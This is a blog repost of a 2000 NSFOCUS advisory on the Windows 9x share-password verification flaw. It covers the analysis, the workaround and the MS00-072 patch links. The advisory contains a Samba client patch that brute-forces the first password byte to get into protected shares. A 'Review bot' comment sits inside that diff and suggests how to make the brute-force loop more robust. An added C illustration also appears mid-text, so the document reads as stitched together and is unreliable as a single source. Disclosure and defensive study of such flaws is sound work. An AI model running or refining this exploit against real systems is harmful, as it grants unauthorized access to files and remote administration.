
Friday, 11 November 2011

Windows 9x share password verification vulnerability

The NSFOCUS Security Team has discovered a security vulnerability in the password verification part of the Microsoft Windows 9x NETBIOS protocol. The vulnerability allows any user to access Windows 9x file sharing services even when the shared directory is password protected. The attacker does not need to know the real password.

Affected software and systems: Microsoft Windows 95, Microsoft Windows 98, Microsoft Windows 98 Second Edition.

Unaffected software and systems: Microsoft Windows NT, Microsoft Windows 2000.

Vulnerability analysis:

The file and print sharing services provided by Windows 9x can be protected with a password to keep unauthorized users out. However, the password verification mechanism of Microsoft's NETBIOS protocol has a serious flaw that makes this protection ineffective. When the server verifies a client's password, it relies on the length value sent by the client. A client can therefore set the length field of the password authentication packet to 1 and send a single byte of plaintext password to the server. The server then compares, in plaintext, the byte sent by the client with the first byte of the stored share password, and if they match it treats the client as authenticated. An attacker thus only needs to guess the first byte of the share password.
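As an added illustration (this is not code from the NSFOCUS advisory, from Windows 9x or from Samba), the following C program models the server-side comparison described above: a stand-in check that compares only as many bytes as the client's length field says, next to a hardened check that uses the stored password's own length and a constant-time comparison. The function names, the constructed share password "secret" and the 256-probe counter are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a share-level password check. The stored share
 * password is a NUL-terminated string; the client supplies the password
 * bytes plus a length field. Names and values are assumptions for
 * illustration, not Windows 9x or Samba code. */

/* Vulnerable variant: the number of bytes compared is taken from the
 * client's length field. The clamp only keeps this toy from reading past
 * the stored buffer; it does not remove the flaw. */
int vuln_check_share_password(const char *stored,
                              const unsigned char *sent, size_t sent_len)
{
    size_t stored_len = strlen(stored) + 1; /* strlen(password)+1, as a normal client sends */
    if (sent_len > stored_len)
        sent_len = stored_len;
    return memcmp(stored, sent, sent_len) == 0;
}

/* Hardened variant: the stored password decides how many bytes must match,
 * and the comparison runs in constant time over the whole password. */
int safe_check_share_password(const char *stored,
                              const unsigned char *sent, size_t sent_len)
{
    size_t stored_len = strlen(stored) + 1;
    if (sent_len != stored_len)
        return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < stored_len; i++)
        diff |= (unsigned char)stored[i] ^ sent[i];
    return diff == 0;
}

typedef int (*check_fn)(const char *, const unsigned char *, size_t);

/* How many of the 256 possible one-byte probes (length field = 1) a
 * checker accepts. For a non-empty password the vulnerable checker accepts
 * exactly one (the first byte); the hardened checker accepts none. */
int count_one_byte_accepts(check_fn check, const char *stored)
{
    int hits = 0;
    for (int b = 0; b < 256; b++) {
        unsigned char probe = (unsigned char)b;
        if (check(stored, &probe, 1))
            hits++;
    }
    return hits;
}

int main(void)
{
    const char *share_password = "secret"; /* constructed sample value */
    const unsigned char guess = 's';

    printf("vulnerable check, 1-byte guess 's': %s\n",
           vuln_check_share_password(share_password, &guess, 1) ? "accepted" : "rejected");
    printf("hardened check,   1-byte guess 's': %s\n",
           safe_check_share_password(share_password, &guess, 1) ? "accepted" : "rejected");
    printf("one-byte probes accepted: vulnerable=%d hardened=%d\n",
           count_one_byte_accepts(vuln_check_share_password, share_password),
           count_one_byte_accepts(safe_check_share_password, share_password));
    return 0;
}
```

The point of the counter is the one the advisory makes: once the server lets the client choose how many bytes are compared, a single correct byte is enough, whereas the hardened check rejects every short probe regardless of its value.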

Remote administration of Microsoft Windows 9x also uses share password authentication, so it is affected by this vulnerability as well.

Vulnerability testing:

A simple test program is provided below.

You need to download the Samba client for Linux and modify its source (source/client/client.c):

--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
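Review bot: the do/while at the end of the hunk has no exit other than a successful tree connect, so against a patched or unaffected server `password[0]` wraps after 255 increments and the loop never terminates, and because the original failure path (`cli_shutdown(c); return NULL;`) is now inside the comment, the caller never sees an error. Bound the loop to 255 attempts and restore the failure return when it is exhausted. Note also that `c->sec_mode = 0` is what forces the plaintext share-level password exchange in which the client-supplied length field of 1 is honoured, which is the condition the advisory's analysis describes.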

Workaround:

NSFOCUS recommends temporarily disabling file sharing services until you have obtained and installed the patch.

Solution:

We have reported this problem to Microsoft, which has released a security bulletin (MS00-072) and a corresponding patch.

The full text of the Microsoft security bulletin is available at:

http://www.microsoft.com/technet/security/bulletin/ms00-072.asp

The English-language patches can be downloaded at the following addresses:

. Microsoft Windows 95: Microsoft will provide a patch as soon as possible

. Microsoft Windows 98 and 98 Second Edition

. Microsoft Windows Me
